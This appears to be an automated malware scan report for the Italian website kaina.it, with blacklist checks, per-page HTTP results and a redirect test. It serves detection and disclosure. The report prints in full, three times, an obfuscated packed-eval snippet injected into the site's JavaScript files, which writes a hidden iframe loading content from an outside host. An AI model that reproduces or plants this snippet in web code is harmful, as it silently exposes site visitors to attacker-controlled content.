Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kaina.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kaina.it/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kaina.it/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Sep 2014 01:21:25 GMT Location: it/index.php Server: Apache/2.2.16 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://kaina.it/it/index.php | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/include/js/toolbarFncs.js | 200 OK Content-Length: 4631 Content-Type: application/javascript | malicious |
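Malicious code - confirmed by antiviruses (see below). The injected part is the packed eval(function(p,a,c,k,e,r){...}) block appended after the file's own code, between the two "<!-- . -->" markers; the identical block is also appended to contactsForm.js and contactsFncs.js in this report. Unpacked with its word list, it is a single document.write call that adds an iframe with style "display:none;" whose src is hxxp://g-statistic[.]info/?id=2 (defanged here), so the frame loads third-party content without being visible to the visitor. File excerpt as shown by the scanner (the legitimate part appears abbreviated): var bgc_over = '#ccc'; var bgc_link = '#4CB0EC'; var layeron = ''; var detect = navigator.userAgent.toLowerCase(); function initlay() { if ((detect.search('mozilla') != -1) || (detect.search('firefox') != -1)){ obj_0 = document.getElementById("divCat_produzione").style; obj_0.visibility = 'hidden'; obj_1 = document.getElementById("divCat_spaccio").style; obj_1.visibility = 'hidden'; } if (document.layers) { obj_0 = doc } } } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports: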
| ||
http://kaina.it/it/company/index.php?PHPSESSID= | 200 OK Content-Length: 14203 Content-Type: text/html | clean |
http://kaina.it/it/index.php?PHPSESSID= | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/ | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/news/index.php?PHPSESSID= | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/news/ | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/contacts/index.php?PHPSESSID= | 200 OK Content-Length: 25429 Content-Type: text/html | clean |
http://kaina.it/it/include/js/contactsForm.js | 200 OK Content-Length: 1978 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Form_Validator(theForm) { if (theForm.privacy_accepted.checked == false) { alert("ATTENZIONE!\n\nPer procedere all'invio delle informazioni รจ necessario aver letto ed approvato l'informativa sulla privacy."); window.open('../privacy/privacy.php','Privacy','toolbar=no,width=520,height=500,directories=no,status=no,scrollbars=yes,resizable=yes,menubar=no'); return (false); } if (theForm.elements['item_field[firstname]'].value == "") { alert return (true); } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://kaina.it/it/include/js/contactsFncs.js | 200 OK Content-Length: 2030 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var layeron = ''; var detect = navigator.userAgent.toLowerCase(); function initlay() { if ((detect.search('mozilla') != -1) || (detect.search('firefox') != -1)){ obj_0 = eval('div_adm.style'); obj_0.visibility = 'hidden'; obj_1 = eval('div_com.style'); obj_1.visibility = 'hidden'; obj_2 = eval('div_mrk.style'); obj_2.visibility = 'hidden'; obj_3 = eval('div_pro.style'); obj_3.visibility = 'hidden'; return; } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://kaina.it/it/contacts/ | 200 OK Content-Length: 25429 Content-Type: text/html | clean |
http://kaina.it/test404page.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
http://kaina.it/it/news/details.php?itemid=22&sectionid=&begincount=0&PHPSESSID= | 200 OK Content-Length: 12389 Content-Type: text/html | clean |
http://kaina.it/it/news/index.php?sectionid=&PHPSESSID= | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/news/details.php?itemid=21&sectionid=&begincount=0&PHPSESSID= | 200 OK Content-Length: 12389 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kaina.it
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 25 Sep 2014 01:21:25 GMT
Location: it/index.php
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
GET / HTTP/1.1
Host: kaina.it
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 25 Sep 2014 01:21:25 GMT
Location: it/index.php
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kaina.it
Referer: http://www.google.com/search?q=kaina.it
Result:
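The result is similar to the first query. No suspicious redirects were found. This check only compares the HTTP response with and without a search-engine Referer; it does not cover content injected by scripts, so it does not contradict the "malicious" verdict on the JavaScript files listed under "Scanned pages/files".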
GET / HTTP/1.1
Host: kaina.it
Referer: http://www.google.com/search?q=kaina.it
Result:
The result is similar to the first query. There are no suspicious redirects found.